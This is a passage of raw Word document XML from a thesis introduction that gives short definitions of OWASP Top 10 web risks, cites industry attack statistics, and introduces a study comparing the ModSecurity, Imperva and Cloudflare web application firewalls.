          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>configured evaluating</w:t>
      </w:r>
      <w:r w:rsidR="002277E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> external entity references within XML documents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F7B891" w14:textId="180D7D63" w:rsidR="0023799B" w:rsidRDefault="00F46BA1" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Broken access control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58900180" w14:textId="22C21C1B" w:rsidR="00171AC5" w:rsidRPr="00171AC5" w:rsidRDefault="00252350" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Often mistaken by or getting mixed up with broken authentication, broken access control </w:t>
      </w:r>
      <w:r w:rsidR="008F673F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>refers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to when user access is not properly configured and implemented, causing authenticated users to be able to access data of other users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A083DE9" w14:textId="2E2713FE" w:rsidR="00F46BA1" w:rsidRDefault="00F46BA1" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Security misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C36C8CC" w14:textId="373A10A5" w:rsidR="008F673F" w:rsidRPr="008F673F" w:rsidRDefault="00C46D3D" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Security misconfiguration is the top reason for web application vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="00822AFE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and is the most common issue. </w:t>
      </w:r>
      <w:r w:rsidR="008013EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>This is normally resulted from default configurations which are insecure, incomplete configurations, misconfigured HTTP headers and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F849AA" w14:textId="4B0842B0" w:rsidR="00F46BA1" w:rsidRDefault="00F46BA1" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Cross Site Scripting XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F324B8" w14:textId="722E0DEC" w:rsidR="004853C4" w:rsidRPr="004853C4" w:rsidRDefault="004853C4" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>XSS, often found to be one of the top attack vectors, refers to when threat actors are able to execute scripts in the client’s browser which may lead to defacement of websites/web applications, redirection to malicious websites or hijack of user session.</w:t>
      </w:r>
      <w:r w:rsidR="00F62CF2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> This is normally done through the use of HTML and Javascript</w:t>
      </w:r>
      <w:r w:rsidR="00B36B40">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and accepted by the web application without proper validation</w:t>
      </w:r>
      <w:r w:rsidR="00F62CF2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEEA83F" w14:textId="54643F1F" w:rsidR="00F46BA1" w:rsidRDefault="00F46BA1" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Insecure deserialisation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D679DB" w14:textId="6B7CED07" w:rsidR="002F3325" w:rsidRPr="002F3325" w:rsidRDefault="002F3325" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Insecure deserialisation refers to when one is led to remote code execution or successful attacks such as privilege escalation and repl</w:t>
      </w:r>
      <w:r w:rsidR="006D2180">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>y attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22502043" w14:textId="46BD11B9" w:rsidR="00F46BA1" w:rsidRDefault="00F46BA1" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Using components with known vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5DBCAC" w14:textId="53893A15" w:rsidR="002E1E01" w:rsidRPr="002E1E01" w:rsidRDefault="002E1E01" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">This risk refers to exploitations through the use of components such as frameworks, libraries and other software modules that run with </w:t>
      </w:r>
      <w:r w:rsidR="0032476A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>identical</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> privileges as</w:t>
      </w:r>
      <w:r w:rsidR="0032476A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> that of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> the application</w:t>
      </w:r>
      <w:r w:rsidR="009325CB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, potentially causing data breaches or even server takeovers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE5306F" w14:textId="48BA343A" w:rsidR="00F46BA1" w:rsidRDefault="00F46BA1" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Insufficient logging and monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A726120" w14:textId="505CE6F2" w:rsidR="004C777D" w:rsidRPr="004C777D" w:rsidRDefault="00940B15" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Insufficient logging and monitoring </w:t>
      </w:r>
      <w:r w:rsidR="00E07C09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>refer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the lack of implementation of logs and detection mechanisms to</w:t>
      </w:r>
      <w:r w:rsidR="00CD1D20">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> detect and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> track access</w:t>
      </w:r>
      <w:r w:rsidR="00CD1D20">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and activities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762A4C36" w14:textId="309CACB4" w:rsidR="000E2933" w:rsidRDefault="00F377EF" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Amongst the OWASP Top 10 risks/vulnerabilities, </w:t>
      </w:r>
      <w:r w:rsidR="00FA5E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Verizon, 2020, reported that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B6106B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">injection was indeed the most exploited vulnerability, specifically, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="00B6106B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, followed by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> PHP code injection</w:t>
      </w:r>
      <w:r w:rsidR="00B6106B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and other injections</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624D1ABA" w14:textId="1CED7D4A" w:rsidR="00FD3DBC" w:rsidRDefault="00FD3DBC" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Similar findings were observed since 2017. Within a two-year period, from December 2017 to November 2019, Akamai (2020) observed over 662 million cyber-attacks on web applications within the finance industry, a fraction of the total of almost 8 billion cyber-attacks across all industries. The top attack vectors across all industries, in sequence, were SQL injection, accounting to more than 72% of the total attacks, local file inclusion, cross site scripting (XSS), PHP command injection, remote file inclusion and lastly, command injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFD1CF8" w14:textId="2C6F5F2A" w:rsidR="00FD3DBC" w:rsidRDefault="00FD3DBC" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">In the first half of 2020, the number cyber-attacks on web applications increased exponentially by nine times when compared the first half of 2019 (CDNetworks, 2020). </w:t>
      </w:r>
      <w:r w:rsidR="005A2235">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>harp increase was observed from March, when most of the world started to work from home due to the Covid-19 pandemic. CDNetworks also reported that the top three attack vectors, in sequence, were brute force, SQL injection and followed by custom rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521E19B2" w14:textId="3F9FDF75" w:rsidR="00865146" w:rsidRPr="003177A6" w:rsidRDefault="006B31B9" w:rsidP="006B31B9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc71138470"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1.4 </w:t>
      </w:r>
      <w:r w:rsidR="00865146" w:rsidRPr="003177A6">
        <w:t>Web Application Firewall (WAF)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="10FE56AF" w14:textId="42993E36" w:rsidR="003177A6" w:rsidRDefault="008358FF" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Web Application Firewall (WAF) is a type of application firewall which main purpose of its invention is to provide protection to web applications.</w:t>
      </w:r>
      <w:r w:rsidR="005E1C00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> WAFs mainly protect against malicious traffic and cyber-attacks </w:t>
      </w:r>
      <w:r w:rsidR="00461DC4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">targeting web applications through vulnerabilities such as those listed in OWASP top 10 </w:t>
      </w:r>
      <w:r w:rsidR="005E1C00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">that occur on </w:t>
      </w:r>
      <w:r w:rsidR="000B6DDA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Open Systems Interconnection (</w:t>
      </w:r>
      <w:r w:rsidR="005E1C00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>OSI</w:t>
      </w:r>
      <w:r w:rsidR="000B6DDA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="005E1C00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> layer 7, the application layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBF6CC0" w14:textId="574E0E4E" w:rsidR="00BD4B9E" w:rsidRPr="00BD488B" w:rsidRDefault="006B31B9" w:rsidP="006B31B9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc71138471"/>
      <w:r>
        <w:t xml:space="preserve">1.5 </w:t>
      </w:r>
      <w:r w:rsidR="00BD4B9E" w:rsidRPr="00BD488B">
        <w:t>Research Question</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="60BBAC9B" w14:textId="77777777" w:rsidR="00BD4B9E" w:rsidRDefault="00BD4B9E" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>To what extent is the effectiveness of a Web Application Firewall on protecting web applications from cyber-attacks?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD9B29E" w14:textId="7EE694B2" w:rsidR="00BD4B9E" w:rsidRDefault="006B31B9" w:rsidP="006B31B9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc71138472"/>
      <w:r>
        <w:t xml:space="preserve">1.6 </w:t>
      </w:r>
      <w:r w:rsidR="00BD4B9E">
        <w:t>Research Challenges</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="06E4489C" w14:textId="2D4F2C0D" w:rsidR="00BE687D" w:rsidRDefault="00BD4B9E" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>One of the main challenges that researchers face is that there is insufficient data available for academic research purposes.</w:t>
      </w:r>
      <w:r w:rsidR="0059624B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Most of the data on WAFs are researched, reported and published by industrial organisations and vendors</w:t>
      </w:r>
      <w:r w:rsidR="00FA09C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, which may be biased or for marketing purposes.</w:t>
      </w:r>
      <w:r w:rsidR="00CA6235">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> As such, another challenge would be to remain neutral and objective when carrying out the research</w:t>
      </w:r>
      <w:r w:rsidR="00EF1470">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and not form any biasness</w:t>
      </w:r>
      <w:r w:rsidR="00CA6235">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C93542" w14:textId="18F250F8" w:rsidR="001E1119" w:rsidRPr="001E1119" w:rsidRDefault="006B31B9" w:rsidP="006B31B9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc71138473"/>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="000A16D3">
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001E1119" w:rsidRPr="001E1119">
        <w:t>Research Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="779DB832" w14:textId="226C6ED4" w:rsidR="001E1119" w:rsidRDefault="001E1119" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">This thesis </w:t>
      </w:r>
      <w:r w:rsidR="00570AC4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>researched on three WAFs, ModSecurity, Imperva’s cloud WAF and Cloudflare’s cloud WAF. S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>everal meaningful results</w:t>
      </w:r>
      <w:r w:rsidR="00570AC4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> were managed to be achieved</w:t>
      </w:r>
      <w:r w:rsidR="00B334A8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="001532B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>based</w:t>
      </w:r>
      <w:r w:rsidR="00B334A8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001532B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidR="00B334A8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> four </w:t>
      </w:r>
      <w:r w:rsidR="001532B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>factors</w:t>
      </w:r>
      <w:r w:rsidR="00B334A8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>; price, performance, alerts/usability and security.</w:t>
      </w:r>
      <w:r w:rsidR="00570AC4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D04C0E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The results were presented,</w:t>
      </w:r>
      <w:r w:rsidR="00BD5AA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> compared,</w:t>
      </w:r>
      <w:r w:rsidR="00D04C0E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> analysed and later on discussed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24155652" w14:textId="77777777" w:rsidR="000F723A" w:rsidRPr="00124BC1" w:rsidRDefault="000F723A" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33E3C665" w14:textId="77777777" w:rsidR="00714386" w:rsidRDefault="00714386" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EDF4E31" w14:textId="77777777" w:rsidR="0020185B" w:rsidRDefault="0020185B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
